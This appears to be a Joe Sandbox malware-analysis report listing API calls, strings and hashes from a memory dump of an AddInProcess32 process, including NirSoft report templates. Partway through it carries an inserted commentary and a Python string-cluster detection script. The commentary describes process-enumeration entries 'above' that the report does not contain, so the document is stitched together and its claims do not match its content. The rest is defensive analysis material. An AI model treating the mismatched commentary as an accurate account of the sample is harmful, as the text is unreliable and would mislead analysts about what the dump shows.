                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                  APIs
                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 552707033-0
                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                  • String ID: 4$h
                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: %%0.%df
                                                                                                  • API String ID: 3473751417-763548558
                                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                  • String ID: A
                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                  APIs
                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 973020956-4135340389
                                                                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
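The two resolver entries above (the psapi.dll EnumProcesses/EnumProcessModules string set, and the GetProcAddress sequence at 0041384C-004138A9 that fetches CreateToolhelp32Snapshot, Process32First/Next and Module32First/Next from kernel32.dll) together with the NirSoft HTML report template (the `http://www.nirsoft.net/` and DOCTYPE strings at 00410A70-00410B3C) are the kind of string clusters an analyst wants to confirm in other dumps of the same family. The script below is an added example, not part of the Joe Sandbox output or of the sample: it scans a raw memory image for each cluster in both ASCII (GetProcAddress names) and UTF-16LE (strings fed to _snwprintf/wcscpy) and applies a YARA-style "N of M" decision per cluster. The image base 0x400000 is the report's `Offset: 00400000`; the sample bytes are constructed here to mimic the report, and the threshold and cluster names are assumptions.

```python
"""Cluster scan of a raw memory dump for the API-name and template strings
listed in the report. Added example; the test image is constructed, not the
real AddInProcess32 dump."""
from dataclasses import dataclass

# Clusters copied from the report entries. Each is a set of strings the dumped
# code references together; most-of-a-cluster is a stronger signal than any
# single string (Process32Next alone is in plenty of benign software).
CLUSTERS = {
    "toolhelp32_process_walk": [
        "kernel32.dll", "CreateToolhelp32Snapshot", "Process32First",
        "Process32Next", "Module32First", "Module32Next",
    ],
    "psapi_process_enum": [
        "psapi.dll", "EnumProcesses", "EnumProcessModules",
        "GetModuleBaseNameW", "GetModuleFileNameExW", "GetModuleInformation",
    ],
    "nirsoft_html_report": [
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
        "http://www.nirsoft.net/",
        "<meta http-equiv='content-type' content='text/html;charset=%s'>",
        '<table dir="rtl"><tr><td>',
    ],
}

@dataclass
class Hit:
    cluster: str
    needle: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int     # byte offset within the dump file

def find_all(haystack: bytes, needle: bytes):
    """Yield every (possibly overlapping) offset of needle in haystack."""
    start = 0
    while (i := haystack.find(needle, start)) >= 0:
        yield i
        start = i + 1

def scan_dump(image: bytes, clusters=CLUSTERS):
    """All hits across both encodings. Import names resolved via GetProcAddress
    are ASCII; the HTML template goes through _snwprintf and is wide, so an
    ASCII-only scan would miss the NirSoft cluster entirely."""
    hits = []
    for name, needles in clusters.items():
        for s in needles:
            for enc in ("ascii", "utf-16le"):
                for off in find_all(image, s.encode(enc)):
                    hits.append(Hit(name, s, enc, off))
    return hits

def cluster_coverage(hits, clusters=CLUSTERS):
    """Fraction of each cluster's strings seen at least once, any encoding."""
    seen = {name: set() for name in clusters}
    for h in hits:
        seen[h.cluster].add(h.needle)
    return {name: len(seen[name]) / len(needles) for name, needles in clusters.items()}

def classify(image: bytes, threshold: float = 0.75, base: int = 0x400000):
    """Return (matched cluster names, coverage per cluster, VA of each string).
    threshold is the assumed 'N of M' cut-off; base is the report's image base."""
    hits = scan_dump(image)
    cov = cluster_coverage(hits)
    matched = sorted(n for n, c in cov.items() if c >= threshold)
    vas = {h.needle: hex(base + h.offset) for h in hits}
    return matched, cov, vas

def build_sample_image() -> bytes:
    """Constructed image: ASCII import names (full Toolhelp32 cluster), a wide
    NirSoft template missing one string (3 of 4), and a lone psapi name."""
    ascii_part = b"\x00" * 0x20 + b"\x00".join(
        s.encode("ascii") for s in CLUSTERS["toolhelp32_process_walk"]) + b"\x00" * 0x10
    wide_part = b"\x00\x00".join(
        s.encode("utf-16le") for s in CLUSTERS["nirsoft_html_report"][:3])
    decoy = b"\x00" * 8 + "EnumProcesses".encode("utf-16le")
    return ascii_part + wide_part + decoy + b"\x90" * 0x40

if __name__ == "__main__":
    matched, cov, vas = classify(build_sample_image())
    for name, c in cov.items():
        print(f"{name:28s} {c:4.0%}  {'MATCH' if name in matched else '-'}")
    for s, va in sorted(vas.items(), key=lambda kv: int(kv[1], 16)):
        print(f"  {va}  {s[:48]}")
```

Against the constructed image the Toolhelp32 cluster matches at 100%, the NirSoft cluster at exactly the 75% cut-off, and the single psapi name is correctly left below threshold; on a real dump, feed `open(path, "rb").read()` to `classify` and compare the reported VAs with the `ref:` addresses in the report.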
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                  • String ID: \systemroot
                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
Strings
• unable to open database: %s, xrefs: 0042F84E
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• out of memory, xrefs: 0042F865
• cannot ATTACH database within transaction, xrefs: 0042F663
• too many attached databases - max %d, xrefs: 0042F64D
• database is already attached, xrefs: 0042F721
• database %s is already in use, xrefs: 0042F6C5
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
APIs
• DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$free
• String ID:
• API String ID: 2802642348-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
                                                                                                  Strings
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Similarity
• API ID: memcpy$memset
• String ID: gj
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
APIs
Strings
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
APIs
Strings
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
APIs
Strings
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <%s>, xrefs: 004100A6
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
APIs
Strings
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
